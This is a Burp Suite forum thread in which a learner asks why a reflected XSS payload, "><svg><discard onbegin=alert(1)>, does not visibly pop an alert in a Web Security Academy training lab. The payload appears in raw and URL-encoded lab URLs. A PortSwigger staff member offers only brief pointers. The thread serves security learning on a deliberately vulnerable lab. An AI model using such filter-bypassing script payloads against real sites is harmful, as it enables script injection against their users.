Burp Suite User Forum

Login to post

Reflected XSS with some SVG markup allowed

montanio | Last updated: Jul 25, 2020 09:12AM UTC

<svg><discard onbegin=alert(1)> I don't know how to pop the window as a solid proof, could you kindly indicate? Appreciate any help. Regards montanio 25 Jul 2020

Liam, PortSwigger Agent | Last updated: Jul 27, 2020 07:57AM UTC

Could you provide some additional context? Where is the payload from?

montanio | Last updated: Jul 27, 2020 01:31PM UTC

Hi Liam, //on url link https://ac941f931fd443468010f16c00db00db.web-security-academy.net/?search=<svg><discard onbegin=alert(1)> //automatic encode https://ac941f931fd443468010f16c00db00db.web-security-academy.net/?search=%3Csvg%3E%3Cdiscard%20onbegin=alert(1)%3E //text above search box 0 search results for '' //pop up: Congratulations, you solved the lab! //original payload from solution https://your-lab-id.web-security-academy.net/?search=%22%3E%3Csvg%3E%3Cdiscard%20onbegin=alert(1)%3E Which is "><svg><discard onbegin=alert(1)> after decoding, The things is I do not know how to trigger alert(1) // discard onbegin

Liam, PortSwigger Agent | Last updated: Jul 28, 2020 06:06AM UTC

To clarify, which lab are you working on?

montanio | Last updated: Aug 01, 2020 01:14PM UTC

Hi Liam, LAB Reflected XSS with some SVG markup allowed https://portswigger.net/web-security/cross-site-scripting/contexts/lab-some-svg-markup-allowed

Liam, PortSwigger Agent | Last updated: Aug 03, 2020 12:06PM UTC

Have you checked out this video tutorial? - https://www.youtube.com/watch?v=FsSsIAELqNg

montanio | Last updated: Aug 09, 2020 03:14PM UTC

Hi Liam, I checked. It did not help with my question. Still can not figure out how to pop the window. Please kindly help. Thank you.

Liam, PortSwigger Agent | Last updated: Aug 10, 2020 09:18AM UTC

The lab is passing as expected in our testing. Keep trying!

You need to Log in to post a reply. Or register here, for free.